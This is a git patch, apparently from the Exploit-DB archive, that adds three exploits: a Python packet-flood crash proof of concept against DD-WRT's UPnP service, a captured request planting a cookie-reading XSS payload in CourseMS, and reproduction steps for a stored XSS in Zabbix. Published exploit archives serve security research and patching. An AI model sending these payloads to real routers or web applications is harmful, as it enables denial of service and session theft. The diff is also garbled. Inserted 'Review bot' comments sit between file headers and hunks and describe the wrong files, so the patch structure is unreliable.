From 3145bbcf804e57abc54f4658c54321f8c98c9caf Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 1 Apr 2021 05:02:01 +0000
Subject: [PATCH] DB: 2021-04-01

3 changes to exploits/shellcodes
DD-WRT 45723 - UPNP Buffer Overflow (PoC)
Zabbix 3.4.7 - Stored XSS
CourseMS 2.1 - 'name' Stored XSS
---
 exploits/hardware/dos/49730.py | 28 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/49731.txt | 26 ++++++++++++++++++++++++++
 exploits/php/webapps/49729.txt | 16 ++++++++++++++++
 files_exploits.csv | 3 +++
 4 files changed, 73 insertions(+)
 create mode 100755 exploits/hardware/dos/49730.py
 create mode 100644 exploits/multiple/webapps/49731.txt
 create mode 100644 exploits/php/webapps/49729.txt

diff --git a/exploits/hardware/dos/49730.py b/exploits/hardware/dos/49730.py
new file mode 100755
index 000000000..384edb62f
--- /dev/null
+++ b/exploits/hardware/dos/49730.py
@@ -0,0 +1,28 @@
+# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC)
+# Date: 24.03.2021
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://dd-wrt.com/
+# Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/
+# Version: 45723 or prior
+# Tested on: TP-Link Archer C7
+
+# https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/
+
+import socket
+
+target_ip = "192.168.2.1" # IP Address of Target
+off = "D"*164
+ret_addr = "AAAA"
+
+payload = off + ret_addr
+
+packet = \
+ 'M-SEARCH * HTTP/1.1\r\n' \
+ 'HOST:239.255.255.250:1900\r\n' \
+ 'ST:uuid:'+payload+'\r\n' \
+ 'MX:2\r\n' \
+ 'MAN:"ssdp:discover"\r\n' \
+ '\r\n'
+
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
+s.sendto(packet, (target_ip, 1900) )
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49731.txt b/exploits/multiple/webapps/49731.txt
new file mode 100644
index 000000000..1605f01f0
--- /dev/null
+++ b/exploits/multiple/webapps/49731.txt
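Review bot: The final line `s.sendto(packet, (target_ip, 1900) )` hands `socket.sendto` a `str`, which only works under Python 2; on Python 3 the call raises `TypeError` before anything leaves the host, and nothing in the header block says which interpreter the PoC was run with. A header line such as `# Interpreter: Python 2 (sendto() is given a str payload)` would save the next reader the guess. The socket is also never released; an `s.close()` after the send is the minimal fix, though for a one-shot script this is cosmetic. Finally, `target_ip` is a hard-coded lab address and `ret_addr = "AAAA"` is a crash-only filler, which the "(PoC)" in the title and the `dos` category imply but the body never states; `# crash PoC: ret_addr is filler, the script only triggers the overflow` next to that assignment would make the intent explicit.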
@@ -0,0 +1,26 @@
+# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
+# Date: 03/30/2021
+# Exploit Author: cptsticky
+# Vendor Homepage: http://sourceforge.net/projects/coursems
+# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
+# Version: 2.1
+# Tested on: Ubuntu 20.04
+
+POST /coursems/admin/add_jobs.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/coursems/admin/add_jobs.php
+Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
+Upgrade-Insecure-Requests: 1
+
+name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
+
+
+Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
\ No newline at end of file
diff --git a/exploits/php/webapps/49729.txt b/exploits/php/webapps/49729.txt
new file mode 100644
index 000000000..ddfd73c08
--- /dev/null
+++ b/exploits/php/webapps/49729.txt
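Review bot: The `Cookie:` header in the captured request carries a full `PHPSESSID` value plus Google Analytics `__utm*` cookies; none of them is needed to understand the issue, and a published advisory should redact session identifiers, e.g. `Cookie: PHPSESSID=<redacted>`. The request targets `/coursems/admin/add_jobs.php`, which presumably needs an authenticated admin session, yet the header block does not state that precondition; a line such as `# Requires: authenticated admin session (add_jobs.php is under /admin/)` would let readers judge exposure. The closing sentence also reads awkwardly; `Any user who opens http://localhost/coursems/add_user.php triggers the stored payload` says the same thing more clearly.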
@@ -0,0 +1,16 @@
+# Exploit Title: Zabbix 3.4.7 - Stored XSS
+# Date: 30-03-2021
+# Exploit Author: Radmil Gazizov
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/rn/rn3.4.7
+# Version: 3.4.7
+# Tested on: Linux
+
+# Reference -
+https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
+
+1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
+2- Create new dashboard
+3- Add a new widget => Type: Map nabigation tree
+4- Past into parameter "Name":
+5- Click to "Add" button
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 628864ab3..f08d7771f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6776,6 +6776,7 @@ id,file,description,date,author,type,platform,port
 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
+49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
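Review bot: Step 4 (`4- Past into parameter "Name":`) ends at the colon with no value, so the reproduction steps as committed are incomplete and a reader must follow the external GitHub reference to learn what the field is expected to hold; the file should either say so explicitly (`4- Paste the value from the referenced POC file into parameter "Name"`) or the rendering of that line should be checked, since the value may have been dropped on the way in. Steps 3 and 4 also carry typos: `Map nabigation tree` should be `Map navigation tree` and `Past into` should be `Paste into`. The only CVE cited, CVE-2019-17382, covers the anonymous-login precondition rather than the XSS itself, and the header gives no fixed version or vendor reference for the XSS; a line such as `# Precondition: dashboard reachable without login (CVE-2019-17382); no CVE is listed here for the XSS` would keep readers from conflating the two.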
@@ -43907,3 +43908,5 @@ id,file,description,date,author,type,platform,port
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,
 49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows,
 49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple,
+49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php,
+49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,